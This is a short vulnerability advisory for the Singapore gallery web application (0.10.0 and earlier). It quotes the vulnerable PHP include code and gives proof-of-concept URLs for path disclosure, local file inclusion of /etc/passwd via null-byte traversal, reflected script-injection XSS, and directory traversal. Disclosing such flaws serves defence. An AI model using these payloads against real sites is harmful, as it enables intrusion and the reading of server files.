Produce       : singapore gallery 
Versions      : 0.10.0 and prior
Site          : http://www.sgal.org/
Discovred By  : Moroccan Security Research Team (Simo64)
Greetz        : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid
              .:r00tkita - s4mi - Silitix - tahati -   And All Friends :)

[-] Vulnerable code near lignes 16-35

<?
 16 .  require_once "includes/singapore.class.php";
 19 .  $sg = new Singapore();
 35 .  include $sg->config->base_path.$sg->config->pathto_current_template."index.tpl.php";
?>

[+] Full Path Disclosure :
**************************
Exemple:

http://localhost/singapore/index.php?template=simo64

Result : 

Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35


[+] Local File Inclusion :
***************************
Proof Of Concept :

http://localhost/singapore/index.php?template=./../../../../etc/passwd%00

[+] Cross Site Scripting :
**************************

http://localhost/singapore/index.php?template=<script>alert('Moroccan Security Team');</script>

[+] Directory Traversal  :
**************************
Proof Of Concept :

http://localhost/singapore/index.php?gallery=./../../../